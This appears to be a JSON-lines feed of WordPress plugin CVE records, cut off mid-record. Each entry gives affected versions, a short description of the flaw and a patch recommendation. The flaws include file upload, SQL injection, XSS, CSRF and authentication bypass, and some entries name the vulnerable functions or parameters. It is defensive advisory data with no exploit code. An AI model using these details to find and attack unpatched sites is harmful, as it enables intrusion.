{"CVE_ID":"CVE-2024-2024","slug":"folders-pro","versionImpact":"3.0.2","versionEndExcluding":"3.0.3","description":"The Folders Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handle_folders_file_upload' function in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with author access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa1d953f-6a5c-46af-a1a5-2c4f90da679a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa1d953f-6a5c-46af-a1a5-2c4f90da679a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0\\\/includes\\\/media.replace.php#L1311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0\\\/includes\\\/media.replace.php#L1311\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3215","slug":"paid-memberships-pro","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"The Paid Memberships Pro \u2013 Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.1. This is due to missing or incorrect nonce validation on the pmpro_update_level_group_order() function. This makes it possible for unauthenticated attackers to update order levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9ef7742-e6f8-4350-90e9-242d9d1b12a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9ef7742-e6f8-4350-90e9-242d9d1b12a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069136\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069136\\\/paid-memberships-pro\\\/trunk\\\/includes\\\/services.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50891","slug":"zoho-forms","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zoho Forms Form plugin for WordPress \u2013 Zoho Forms allows Stored XSS.This issue affects Form plugin for WordPress \u2013 Zoho Forms: from n\/a through 3.0.1.\n\n","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-forms\\\/wordpress-zoho-forms-plugin-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-forms\\\/wordpress-zoho-forms-plugin-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11460","slug":"verowa-connect","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"The Verowa Connect plugin for WordPress is vulnerable to SQL Injection via the 'search_string' parameter in all versions up to, and including, 3.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verowa-connect\\\/trunk\\\/general\\\/rest-routes.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verowa-connect\\\/trunk\\\/general\\\/rest-routes.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201030%40verowa-connect&new=3201030%40verowa-connect&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201030%40verowa-connect&new=3201030%40verowa-connect&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5855","slug":"media-hygiene","versionImpact":"3.0.1","versionEndExcluding":"3.0.2","description":"The Media Hygiene: Remove or Delete Unused Images and More! plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the bulk_action_delete and delete_single_image_call AJAX actions in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary attachments. A nonce check was added in version 3.0.1, however, it wasn't until version 3.0.2 that a capability check was added.","recommendation":"Update to version 3.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b02690-462a-458b-88c9-89acc9c209cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44b02690-462a-458b-88c9-89acc9c209cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3112249%40media-hygiene&new=3112249%40media-hygiene&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3112249%40media-hygiene&new=3112249%40media-hygiene&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4278","slug":"masterstudy-lms-learning-management-system","versionEndExcluding":"3.0.18","description":"The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and\/or posts.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb3173ec-9891-4bd8-9d05-24fe805b5235\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb3173ec-9891-4bd8-9d05-24fe805b5235\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2395","slug":"bulgarisation-for-woocommerce","versionImpact":"3.0.14","versionEndExcluding":"3.0.15","description":"The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.14. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to generate and delete labels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ff1d12e-1129-40d3-8c29-3a46ffc77872?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0683","slug":"bulgarisation-for-woocommerce","versionImpact":"3.0.14","versionEndExcluding":"3.0.15","description":"The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14. This makes it possible for unauthenticated and authenticated attackers, with subscriber-level access and above, to generate and delete labels.","recommendation":"Update to version 3.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be759c83-a9df-4858-a724-28006a595404?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be759c83-a9df-4858-a724-28006a595404?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30796","slug":"wpextended","versionImpact":"3.0.14","versionEndExcluding":"3.0.15","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit \u2013 WP Extended allows Reflected XSS. This issue affects The Ultimate WordPress Toolkit \u2013 WP Extended: from n\/a through 3.0.14.","recommendation":"Update to version 3.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpextended\\\/vulnerability\\\/wordpress-the-ultimate-wordpress-toolkit-wp-extended-plugin-3-0-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wpextended\\\/vulnerability\\\/wordpress-the-ultimate-wordpress-toolkit-wp-extended-plugin-3-0-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13554","slug":"wpextended","versionImpact":"3.0.13","versionEndExcluding":"3.0.14","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reorder_route() function in all versions up to, and including, 3.0.13. This makes it possible for unauthenticated attackers to reorder posts.","recommendation":"Update to version 3.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233951%40wpextended&new=3233951%40wpextended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233951%40wpextended&new=3233951%40wpextended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136ecfa1-5591-4636-bc30-6c68ddc7f277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/136ecfa1-5591-4636-bc30-6c68ddc7f277?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11916","slug":"wpextended","versionImpact":"3.0.11","versionEndExcluding":"3.0.12","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification and retrieval of data due to a missing capability check on several functions in all versions up to, and including, 3.0.11. This makes it possible for authenticated attackers, with subscriber-level access and above, to import and activate arbitrary code snippets along with","recommendation":"Update to version 3.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747d7649-bdf5-46d0-a496-59cb7eac77ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/747d7649-bdf5-46d0-a496-59cb7eac77ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11816","slug":"wpextended","versionImpact":"3.0.11","versionEndExcluding":"3.0.12","description":"The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Remote Code Execution in version 3.0.11. This is due to a missing capability check on the 'wpext_handle_snippet_update' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute code on the server providing an admin has created at least one code snippet.","recommendation":"Update to version 3.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213331%40wpextended&new=3213331%40wpextended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3ce53e5-8666-4227-83d3-58f35db0ce68?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3ce53e5-8666-4227-83d3-58f35db0ce68?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13406","slug":"xml-for-google-merchant-center","versionImpact":"3.0.11","versionEndExcluding":"3.0.12","description":"The XML for Google Merchant Center plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'feed_id' parameter in all versions up to, and including, 3.0.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226403%40xml-for-google-merchant-center&new=3226403%40xml-for-google-merchant-center&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226403%40xml-for-google-merchant-center&new=3226403%40xml-for-google-merchant-center&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f66ae-65aa-4670-8b69-103070a000a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f66ae-65aa-4670-8b69-103070a000a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9347","slug":"wpextended","versionImpact":"3.0.9","versionEndExcluding":"3.0.10","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpext-export' parameter in all versions up to, and including, 3.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/822c0a33-e57e-48c7-b8df-fddf3bb2e552?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/822c0a33-e57e-48c7-b8df-fddf3bb2e552?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/tags\\\/3.0.9\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/tags\\\/3.0.9\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169963\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169963\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0874","slug":"klaviyo","versionEndExcluding":"3.0.10","description":"The Klaviyo WordPress plugin before 3.0.10 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/495e39db-793d-454b-9ef1-dd91cae2c49b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/495e39db-793d-454b-9ef1-dd91cae2c49b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1763","slug":"wp-social","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \/wp_social\/v1\/ REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to enable and disable certain providers for the social share and login features.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10874","slug":"quotes-llama","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Quotes llama plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quotes-llama' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quotes-llama\\\/tags\\\/3.0.0\\\/includes\\\/classes\\\/class-quotesllama-search.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quotes-llama\\\/tags\\\/3.0.0\\\/includes\\\/classes\\\/class-quotesllama-search.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9835","slug":"rss-feed-widget","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The RSS Feed Widget WordPress plugin before 3.0.1 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0277b060-805d-4b85-b5a4-fa93a731cd8d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0277b060-805d-4b85-b5a4-fa93a731cd8d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0169","slug":"zoho-forms","versionEndExcluding":"3.0.1","description":"The Zoho Forms WordPress plugin before 3.0.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/178d71f2-4666-4f7e-ada5-cb72a50fd663\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/178d71f2-4666-4f7e-ada5-cb72a50fd663\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8187","slug":"post-carousel","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Smart Post Show  WordPress plugin before 3.0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e51b3b5-f003-4af9-8538-95f266065e36\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e51b3b5-f003-4af9-8538-95f266065e36\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3743","slug":"upsell-order-bump-offer-for-woocommerce","versionImpact":"3.0.0","versionEndExcluding":"3.0.1","description":"The Upsell Funnel Builder for WooCommerce plugin for WordPress is vulnerable to order manipulation in all versions up to, and including, 3.0.0. This is due to the plugin allowing the additional product ID and discount field to be manipulated prior to processing via the 'add_offer_in_cart' function. This makes it possible for unauthenticated attackers to arbitrarily update the product associated with any order bump, and arbitrarily update the discount applied to any order bump item, when adding it to the cart.","recommendation":"Update to version 3.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1771\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1771\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1773\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1773\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1818\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1818\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/upsell-order-bump-offer-for-woocommerce\\\/tags\\\/3.0.0\\\/public\\\/class-upsell-order-bump-offer-for-woocommerce-public.php#L1829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279944\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279944\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0e1546b-c8cc-4d57-9909-153209e3a9c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0e1546b-c8cc-4d57-9909-153209e3a9c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34180","slug":"free-google-fonts","versionEndExcluding":"3.0.1","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in KAPlugins Google Fonts For WordPress plugin <=\u00a03.0.0 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/free-google-fonts\\\/wordpress-google-fonts-for-wordpress-plugin-3-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/free-google-fonts\\\/wordpress-google-fonts-for-wordpress-plugin-3-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10002","slug":"rover-idx","versionImpact":"3.0.0.2905","versionEndExcluding":"3.0.0.2906","description":"The Rover IDX plugin for WordPress is vulnerable to Authentication Bypass in versions up to, and including, 3.0.0.2905. This is due to insufficient validation and capability check on the 'rover_idx_refresh_social_callback' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in to administrator. The vulnerability is partially patched in version 3.0.0.2905 and fully patched in version 3.0.0.2906.","recommendation":"Update to version 3.0.0.2906, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/rover-social-common.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/rover-social-common.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-social.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rover-idx\\\/tags\\\/3.0.0.2903\\\/admin\\\/rover-panel-social.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173032\\\/rover-idx\\\/trunk\\\/rover-social-common.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173032\\\/rover-idx\\\/trunk\\\/rover-social-common.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10003","slug":"rover-idx","versionImpact":"3.0.0.2903","versionEndExcluding":"3.0.0.2905","description":"The Rover IDX plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 3.0.0.2903. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options.","recommendation":"Update to version 3.0.0.2905, or a newer patched 